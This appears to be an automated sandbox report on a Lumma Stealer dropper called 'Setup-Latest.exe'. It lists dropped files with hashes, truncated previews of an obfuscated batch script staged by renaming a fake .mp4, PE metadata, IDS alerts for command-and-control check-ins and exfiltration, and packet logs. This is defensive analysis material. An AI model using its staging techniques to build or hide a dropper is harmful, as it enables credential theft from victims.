                                    SHA-512:153351CF07D1622BE5182E6AF4F45D7C1CD28121CD2034677A7358EAE5B52F5B47A4AB82F1464923BAE6716EAA5C2F91703D97E79D117E6006374FF3791C83AE
                                    Malicious:false
                                    Preview:..-..8..*..J3....K.z..R:...H.:....".F. ...B5.4L,.....Fu.k..5.1..uSw.J.|....>...Xt........tyN[V;.<....*v.:<6.f'R..=..k|..].].Q....DL..:.h....v"t.!...h.T..e.2.^...M."..Ny.nb...:.e............X..(+R.k.w..L....I.gg.....2O0C......}.5H..B....~.l.3KB..ZM..;.......A:u..e..0.4..v+..p..."..{O.b-.;..~.2p.o.$.*;.(....C.!...x_..Z[....3..........+R..q_...|l..q....d.JUC.,..7..%.3P.}.t-.+..?~..f+.\"`.p..D...*.F..!....n..j..{.s......HU./p.o.48w...a.Y.x....w.I..~|....!bm../.j...f.o...V....C.'..3..~.4:?....gJs...|....-C.........x1.0.........D..J.....+...^.g.|...>L....zj&PO.q.6...*..]..k.[jG...~.L.i.!...>S..?1..D4.qG.m.m....l......I....).SN}Z*.}....r.^..@......RF..x.u......1.....z>...{..XM......S..S*D.....E......0.....4V.m}.~...M&.c.j.W..I+1m/.;sU.....18=.b.5.....!=....*..N&.SZO.A..t.2...[.8y.|.<Q.~....8.fd.....Xl...X...Z.AH..6A.......0>.8...c.[.b^...6.z..?.M.m..Z.r.&..a.\.:m4.F...>....u.!.d'.S.C.]k7....v...0.-.........~.95..e.:.:....Ag.w...7...U.i....f^@..K

                                    C:\Users\user\AppData\Local\Temp\Suggestions

                                    Download File
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):103424
                                    Entropy (8bit):5.875802200515394
                                    Encrypted:false
                                    SSDEEP:1536:J6R8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPt:Jq8QLeAg0Fuz08XvBNbjaAtsPt
                                    MD5:278722175E3D420CB44282477C2811E9
                                    SHA1:F7246A2B43DC80493BC9C2E27DBB0794CACE09C8
                                    SHA-256:D56EE71B68B9DA84BEE2D64A83F0D3C1DD80B8E27D9BCC240F068DFBB24425E2
                                    SHA-512:75A30B2349F72209E3DE32E8C66A28000AF53319ADFEB14092691ECC79B6DA2C0E68D8A65762E93ED5032D790BC5F4CE04E15FB225BA4B169CCED0470A3073D4
                                    Malicious:false
                                    Preview:..`.* ......a.p.i.-.m.s.-.w.i.n.-.c.o.r.e.-.s.y.n.c.h.-.l.1.-.2.-.0...d.l.l.....k.e.r.n.e.l.3.2...d.l.l.....InitializeConditionVariable.SleepConditionVariableCS....WakeAllConditionVariable.....CL...B...B.Unknown exception...0DL...B...B.bad allocation..|DL...B...B.bad array new length.....DL.n.B.X.M...M.((I.8A.O....^......E.R.R.O.R. .:. .U.n.a.b.l.e. .t.o. .i.n.i.t.i.a.l.i.z.e. .c.r.i.t.i.c.a.l. .s.e.c.t.i.o.n. .i.n. .C.A.t.l.B.a.s.e.M.o.d.u.l.e.......csm................. .............J...J.H.J.a.p.i.-.m.s.-.w.i.n.-.c.o.r.e.-.f.i.b.e.r.s.-.l.1.-.1.-.1...a.p.i.-.m.s.-.w.i.n.-.c.o.r.e.-.s.y.n.c.h.-.l.1.-.2.-.0.....k.e.r.n.e.l.3.2.....a.p.i.-.m.s.-...e.x.t.-.m.s.-...........FlsAlloc............FlsFree.........FlsGetValue.........FlsSetValue.........InitializeCriticalSectionEx..EL...B...B.bad exception.....J...J...J...J...J...J...J...J...J...J...J.$.J.,.J.8.J.D.J.N.J.P.J.X.J.`.J.d.J.h.J.l.J.p.J.t.J.x.J.|.J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J...J.

                                    C:\Users\user\AppData\Local\Temp\Textbooks

                                    Download File
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):97280
                                    Entropy (8bit):6.676869777709325
                                    Encrypted:false
                                    SSDEEP:1536:ixv5mjKu2IwNnPEBiqXv+G/UXT6TvY464qvI932eOypvcLSDOSpZ+Sh+I+FrbY:g5mjccBiqXvpgF4qv+32eOyKODOSpQSB
                                    MD5:BF83026F801F9FF754FC88D937CA1E08
                                    SHA1:995F512E1452D7B1B8BF6ACC1CAD4A97E5D67138
                                    SHA-256:4CB81DBC3C21BC612B3E70BBCC515E4B99F7A82B8C39FBEC2315D430B30FA53C
                                    SHA-512:EB3FB93CA0982F0B2DBC70694FE0AB0C151D67C3C58025951593384CC020EB7006FAEF99EF8F5344A9A0A74698F5C332F34826180F223B77782912263B4459C0
                                    Malicious:false
                                    Preview:.tO.....B.+.u...~...B.+.u...~...B.+.t.3.......M........N...B.+.t.3........E......3.........F.;B.tO.....B.+.u...~...B.+.u...~...B.+.t.3.......M........N...B.+.t.3........E......3.........F.;B.tO.....B.+.u...~...B.+.u...~...B.+.t.3.......M........N...B.+.t.3........E......3.........F.;B.tP..B...~.+.u...~...B.+.u...~...B.+.t.3.......M........N...B.+.t.3........E......3.........F.;B.tO.....B.+.u...~...B.+.u...~...B.+.t.3.......M........N...B.+.t.3........E......3..u_.F.;B.tO.....B.+.u...~...B.+.u...~...B.+.t.3.......M........N...B.+.t.3........E......3..u.3.._......F.;B.tO.....B.+.u...~...B.+.u...~...B.+.t.3.......M........N...B.+.t.3........E......3..u..F.;B.tO.....B.+.u...~...B.+.u...~...B.+.t.3.......M........N...B.+.t.3........E......3....:....F.;B.tO.....B.+.u...~...B.+.u...~...B.+.t.3.......M........N...B.+.t.3........E......3.........F.;B.tO.....B.+.u...~...B.+.u...~...B.+.t.3.......M........N...B.+.t.3........E......3....x....F.;B.tO.....B.+.u...~...B.+.u...~..

                                    C:\Users\user\AppData\Local\Temp\Uniform

                                    Download File
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):132096
                                    Entropy (8bit):6.377855016772332
                                    Encrypted:false
                                    SSDEEP:3072:/g5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWfr:45vPeDkjGgQaE/loUDtfr
                                    MD5:61DFE44D20EEEA4E73F494D30A371F8F
                                    SHA1:6BD26783B24F1A4E1813F5C1B1D5EE3D215C39DA
                                    SHA-256:E7EDE2194B1C1C501A5D61F2365E42E8A9F186B036A639163165BF6737CD73B1
                                    SHA-512:211E140A4D9064F6011C346BDD016DE7D38A823457029E0A13ECD8989C09A4C81509A7ADCFDA1B05553B04C9D186C2000C691B566D21E5AE3C452CBBE3641F29
                                    Malicious:false
                                    Preview:..P........D$.;F.t.P.....3.@_^..]....L$..N...3...U..V.u.;5t)M.........T)M........t.Q......T)M..... ...`)M...T)M.;5d)M.u....|.....8.u.N...5d)M...X)M.^...v..D...8.t.]...I..X)M.j..4......T)M.YY..X)M..$....X)M....v..T)M...x)M....t)M...T...V..Np......NT....N$....N....h....V.C...YY..^...U..VW.}.........M...tF.E.S..t.;.....uH.^.....Q.........;...a...........h....V......E.YY..t.[j.j..7..X.I._^].....u.........M...t...6..V..j..N..V..F..4......F.YY.N.^.$...SVW..j._..l...............u.Nl.....N(...h....V.U...YY_..^[...U...u...(M......U...t...@)M.......y..u&...)M...u...M.........Qj..u...x.I.].....)M...U...u...(M..H.....@)M.......q.P.....j..u.j..u...x.I.]...U..M....t.W.}.........._]...V..4.I...(M.P..........t...@)M...j.....0.....^...U....SVW.}..E.P..7....I..E.l....E...p....E.PV..x.I..M.E.;.t...u.;.x...uw.s..5..I.......f#.j.f.E.X.s.....E...u.f......f#.j.X...f.M..E.;.|..........}..t...|...;.......;....}..t......._^[.....}....t.....x.....s.......U......(M.V.u.WV.......

                                    C:\Users\user\AppData\Local\Temp\Volunteers

                                    Download File
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):60796
                                    Entropy (8bit):6.7963392656053925
                                    Encrypted:false
                                    SSDEEP:1536:Wo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:WNoGmROL7F1G7ho2kOb
                                    MD5:6DFF01D20DAC1DF6B76115A500A13A94
                                    SHA1:71BC9419B18568112D2CB9EB6A85E017850C2391
                                    SHA-256:7E530D5163218B0CA02450150218A0F24C6F8179DFBD31B58121604115AD8362
                                    SHA-512:F3F75F8D251724381D526373BBA5F716A4C9F57593F825BFB40444FAE25CA2E2E3F27ED1E07ABCEDE3E03F0C3428A0905073B0E67C56376764A1A44753748909
                                    Malicious:false
                                    Preview:&..W.>.....A=.m...+...4.....`#.w+0.....S`>.H...l.8`.......5.l...27..:...%.6..>@.......p'.]1.!..m..>..6............~[D.7......s...g...Q...`...i....84...Pu.o......E.wU....k:..y...<'"....B...Ldy..4.....J.n.....4z...O.5@_G.G.t..7.L...\U._W./'..f....^\\l1..".).i..w`.q.....*...\..2...|~........0I.Z.n.3....#B&.n......U.35..h..n...B..R...).G....lU..J,..>...T....r+...+0D...t....3...=."..h.Y.k.....Db......r6....".;.O.....7N..^"......n.0>W.6D`.BoG.....w'HF[......|.'X..m..i...j.....0;;+.P(e...P..m.?.P.,6J.+.%.Od.:...........F...`gW.].IFz..V-...i..TU?oY.Z.5....To.i....Xk$..%..Y..A.-..b............]f.X.T..Xv.z..!.L...$..1....3JoG...0.A.[.6p....r.......$.f~..#.....m......k%n...._f..N~..z.B.lQ,[.....Tl....i.....>...`..c. ..V.Sa..Q....(V.3.......7..F.~jf.Ph.m.......# .....^...V..^bu...z......"...k.2.M..,.l..R,[..+.;$.D.o.....W..M...,....?.P.x8H$. ...n........5^.m].......m..d2...G...V...{.....7j-....P,WX.(.Q.P..-....m+....R.T..XKE.....!.|U....i..L..i...hk...o.C

                                    C:\Users\user\AppData\Local\Temp\Wide.mp4

                                    Download File
                                    Process:C:\Users\user\Desktop\Setup-Latest.exe
                                    File Type:ASCII text, with very long lines (548), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):14822
                                    Entropy (8bit):5.178112333023097
                                    Encrypted:false
                                    SSDEEP:384:dwaVOOqcLlU/xHZdwb5029PJK5e3KkTg5o5YILnweV4SknBO:diOq0lGPS02BJEe3KjaweknI
                                    MD5:7E4CF5266498C16090BA55F200F39973
                                    SHA1:76D6CFA9C48D5EC5DC2410A61DFFF30343434390
                                    SHA-256:F9DFFD2A81287E0C2CB1BB77F33E7000BFD875F6ADC796EE9E1BFBC6B6B9F083
                                    SHA-512:3AE8D7F61B9D28832B44B41A9F7D6C82C75B32AB745D93953C8E1CBE1E4DA2DEC4928CB958D09C79B1B41788F023AD12FC554D34E6DE3310A6F480BB6F8C167C
                                    Malicious:false
                                    Preview:Set Women=U..ZEFigured-Women-Chairman-Inflation-Von-Faced-Eden-Analyses-Newest-..MvSpent-Floral-Including-Reproduce-Accounts-Hydraulic-Dealers-Nightlife-Blocking-..kqHWins-Industry-Complaint-Coat-Periodically-Stainless-..XkwQ-Concerns-Blocked-Www-..MaQyTerritories-Hdtv-November-Detroit-Mega-Fortune-..jnVExperiments-Regression-Enters-Municipality-..rtETextile-Castle-Hb-Facial-..Set Adaptation=6..IXEBibliographic-..YVShipment-..HFVideos-..jnWuSh-Viewer-Checks-Brook-Hardware-Beginner-Pda-Actress-Mpg-..dyzjIncreases-Comp-..WWpJAlt-French-Household-Continues-Nevertheless-Coordinator-Essays-Wc-House-..bSZVictims-Prayers-Archives-Evaluating-..ntLBStrengths-Solving-Employer-..Set Pierre=A..dyCbPhentermine-Pointing-Vancouver-Mv-Gregory-Trials-Beings-Prisoner-Authentication-..ajZATorture-Preceding-..lyFinland-Marketplace-Enclosed-Incident-Instructor-Latex-Virtually-Electrical-..wIzzCycle-Strange-Friendship-Reverse-Juice-Shore-Spine-..WfcDShopzilla-Rules-Operates-Amendments-Florists-Fixed-..duCed

                                    C:\Users\user\AppData\Local\Temp\wide.mp4.bat

                                    Download File
                                    Process:C:\Windows\SysWOW64\expand.exe
                                    File Type:ASCII text, with very long lines (548), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):14822
                                    Entropy (8bit):5.178112333023097
                                    Encrypted:false
                                    SSDEEP:384:dwaVOOqcLlU/xHZdwb5029PJK5e3KkTg5o5YILnweV4SknBO:diOq0lGPS02BJEe3KjaweknI
                                    MD5:7E4CF5266498C16090BA55F200F39973
                                    SHA1:76D6CFA9C48D5EC5DC2410A61DFFF30343434390
                                    SHA-256:F9DFFD2A81287E0C2CB1BB77F33E7000BFD875F6ADC796EE9E1BFBC6B6B9F083
                                    SHA-512:3AE8D7F61B9D28832B44B41A9F7D6C82C75B32AB745D93953C8E1CBE1E4DA2DEC4928CB958D09C79B1B41788F023AD12FC554D34E6DE3310A6F480BB6F8C167C
                                    Malicious:false
                                    Preview:Set Women=U..ZEFigured-Women-Chairman-Inflation-Von-Faced-Eden-Analyses-Newest-..MvSpent-Floral-Including-Reproduce-Accounts-Hydraulic-Dealers-Nightlife-Blocking-..kqHWins-Industry-Complaint-Coat-Periodically-Stainless-..XkwQ-Concerns-Blocked-Www-..MaQyTerritories-Hdtv-November-Detroit-Mega-Fortune-..jnVExperiments-Regression-Enters-Municipality-..rtETextile-Castle-Hb-Facial-..Set Adaptation=6..IXEBibliographic-..YVShipment-..HFVideos-..jnWuSh-Viewer-Checks-Brook-Hardware-Beginner-Pda-Actress-Mpg-..dyzjIncreases-Comp-..WWpJAlt-French-Household-Continues-Nevertheless-Coordinator-Essays-Wc-House-..bSZVictims-Prayers-Archives-Evaluating-..ntLBStrengths-Solving-Employer-..Set Pierre=A..dyCbPhentermine-Pointing-Vancouver-Mv-Gregory-Trials-Beings-Prisoner-Authentication-..ajZATorture-Preceding-..lyFinland-Marketplace-Enclosed-Incident-Instructor-Latex-Virtually-Electrical-..wIzzCycle-Strange-Friendship-Reverse-Juice-Shore-Spine-..WfcDShopzilla-Rules-Operates-Amendments-Florists-Fixed-..duCed

                                    \Device\ConDrv

                                    Download File
                                    Process:C:\Windows\SysWOW64\expand.exe
                                    File Type:ASCII text, with CRLF, CR, LF line terminators
                                    Category:dropped
                                    Size (bytes):167
                                    Entropy (8bit):4.808946640512676
                                    Encrypted:false
                                    SSDEEP:3:RGXKRjN3MZ9aSLKLbzXDD9jmKXVM8/FAJoDYTzMKpVteSMsIVOqSRIVbUbFHgzK+:zx3MmSLQHtBXVNsTTISM7vSRoIAzKs7
                                    MD5:A14C8E1DDDC9FD927A50CFF2435A7799
                                    SHA1:47F4AC00DBF7563A2D025AA9D72E5BDEDCBDC3DC
                                    SHA-256:247A99FF374C62520693BA4CF08F35E1862ACF8E5D61055513A3C4F9F7B77454
                                    SHA-512:94FC2D645CD89A43D86B368B64BCD1FB13C412137F8AAF300833EC7FC678EE71C0B29866D392D11332E9DD75593B7AA816C073D3AEEA1985E813B0FCDEB2F065
                                    Malicious:false
                                    Preview:Microsoft (R) File Expansion Utility..Copyright (c) Microsoft Corporation. All rights reserved.....Copying wide.mp4 to wide.mp4.bat...wide.mp4: 14822 bytes copied.....

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.718085500786066
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:Setup-Latest.exe
                                    File size:1'444'885 bytes
                                    MD5:d905d14928e2766285ed7ca83eaaf4b3
                                    SHA1:5d27b2c538c81f7819f7de1071c28ecd03c5bd2e
                                    SHA256:721f6073f9ec13d9a1b7cff7b7cfab342ec6fd5ebc1a95c006ae11198e8abfc9
                                    SHA512:88862cdfde9a0bbedad8f16c0387ac305802434daf55e813614d33383edca078fea89f65ceea0f79d60582739807f8a23ce7f7f2083f56e7bed191305dea7619
                                    SSDEEP:24576:oGXt9+6qjfYMk9qXo1UPDPdDoIKgweD1F4h/ym4iB5ePtH4M/d8rOn21:ZXt9+nfUsSs1oIK+7Kv5e1D/6rO21
                                    TLSH:C76502D3ED8066E5FCBA0539E4370C650667BC278AD91E1F61C4B62918B30535A3FE2B
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8.....

                                    File Icon

                                    Icon Hash:70f8f4cca4f0b090

                                    Static PE Info

                                    General

                                    Entrypoint:0x4038af
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:0
                                    File Version Major:5
                                    File Version Minor:0
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:0
                                    Import Hash:be41bf7b8cc010b614bd36bbca606973

                                    Entrypoint Preview

                                    Instruction
                                    sub esp, 000002D4h
                                    push ebx
                                    push ebp
                                    push esi
                                    push edi
                                    push 00000020h
                                    xor ebp, ebp
                                    pop esi
                                    mov dword ptr [esp+18h], ebp
                                    mov dword ptr [esp+10h], 0040A268h
                                    mov dword ptr [esp+14h], ebp
                                    call dword ptr [00409030h]
                                    push 00008001h
                                    call dword ptr [004090B4h]
                                    push ebp
                                    call dword ptr [004092C0h]
                                    push 00000008h
                                    mov dword ptr [0047EB98h], eax
                                    call 00007F968863F74Bh
                                    push ebp
                                    push 000002B4h
                                    mov dword ptr [0047EAB0h], eax
                                    lea eax, dword ptr [esp+38h]
                                    push eax
                                    push ebp
                                    push 0040A264h
                                    call dword ptr [00409184h]
                                    push 0040A24Ch
                                    push 00476AA0h
                                    call 00007F968863F42Dh
                                    call dword ptr [004090B0h]
                                    push eax
                                    mov edi, 004CF0A0h
                                    push edi
                                    call 00007F968863F41Bh
                                    push ebp
                                    call dword ptr [00409134h]
                                    cmp word ptr [004CF0A0h], 0022h
                                    mov dword ptr [0047EAB8h], eax
                                    mov eax, edi
                                    jne 00007F968863CD1Ah
                                    push 00000022h
                                    pop esi
                                    mov eax, 004CF0A2h
                                    push esi
                                    push eax
                                    call 00007F968863F0F1h
                                    push eax
                                    call dword ptr [00409260h]
                                    mov esi, eax
                                    mov dword ptr [esp+1Ch], esi
                                    jmp 00007F968863CDA3h
                                    push 00000020h
                                    pop ebx
                                    cmp ax, bx
                                    jne 00007F968863CD1Ah
                                    add esi, 02h
                                    cmp word ptr [esi], bx

                                    Rich Headers

                                    Programming Language:
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [ C ] VS2010 SP1 build 40219
                                    • [RES] VS2010 SP1 build 40219
                                    • [LNK] VS2010 SP1 build 40219

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x59bf0.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x1000000x59bf00x59c00acd5443f264e726442ae2af07f8bdb5aFalse0.6048158948467967data6.306430627767441IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x15a0000xfd60x1000fa4a4c5c82d91034c29d65a3dc8522daFalse0.1904296875data2.4330952769333423IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0x1001f00x44028Device independent bitmap graphic, 256 x 512 x 32, image size 278528EnglishUnited States0.5892313546423136
                                    RT_ICON0x1442180x11028Device independent bitmap graphic, 128 x 256 x 32, image size 69632EnglishUnited States0.6515816970949593
                                    RT_ICON0x1552400x4428Device independent bitmap graphic, 64 x 128 x 32, image size 17408EnglishUnited States0.6806510774873911
                                    RT_DIALOG0x1596680x100dataEnglishUnited States0.5234375
                                    RT_DIALOG0x1597680x11cdataEnglishUnited States0.6056338028169014
                                    RT_DIALOG0x1598880x60dataEnglishUnited States0.7291666666666666
                                    RT_GROUP_ICON0x1598e80x30dataEnglishUnited States0.8541666666666666
                                    RT_MANIFEST0x1599180x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                    Imports

                                    DLLImport
                                    KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                    USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                    GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                    SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                    ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                    ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                    VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2025-02-14T16:55:55.172476+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737188.114.97.3443TCP
                                    2025-02-14T16:55:55.683804+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449737188.114.97.3443TCP
                                    2025-02-14T16:55:55.683804+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449737188.114.97.3443TCP
                                    2025-02-14T16:55:56.196791+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738188.114.97.3443TCP
                                    2025-02-14T16:55:56.847472+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449738188.114.97.3443TCP
                                    2025-02-14T16:55:57.459844+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739188.114.97.3443TCP
                                    2025-02-14T16:55:58.812520+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449739188.114.97.3443TCP
                                    2025-02-14T16:55:59.322762+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740188.114.97.3443TCP
                                    2025-02-14T16:56:00.447277+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741188.114.97.3443TCP
                                    2025-02-14T16:56:01.763539+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742188.114.97.3443TCP
                                    2025-02-14T16:56:03.118342+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743188.114.97.3443TCP
                                    2025-02-14T16:56:05.414362+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744188.114.97.3443TCP
                                    2025-02-14T16:56:05.960131+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449744188.114.97.3443TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Feb 14, 2025 16:55:54.685514927 CET49737443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:54.685540915 CET44349737188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:54.685604095 CET49737443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:54.689055920 CET49737443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:54.689066887 CET44349737188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:55.172368050 CET44349737188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:55.172476053 CET49737443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:55.175980091 CET49737443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:55.175986052 CET44349737188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:55.176805019 CET44349737188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:55.220818996 CET49737443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:55.220838070 CET49737443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:55.221067905 CET44349737188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:55.683769941 CET44349737188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:55.683877945 CET44349737188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:55.683947086 CET49737443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:55.690654993 CET49737443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:55.690673113 CET44349737188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:55.693859100 CET49738443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:55:55.693914890 CET44349738188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:55:55.693995953 CET49738443192.168.2.4188.114.97.3
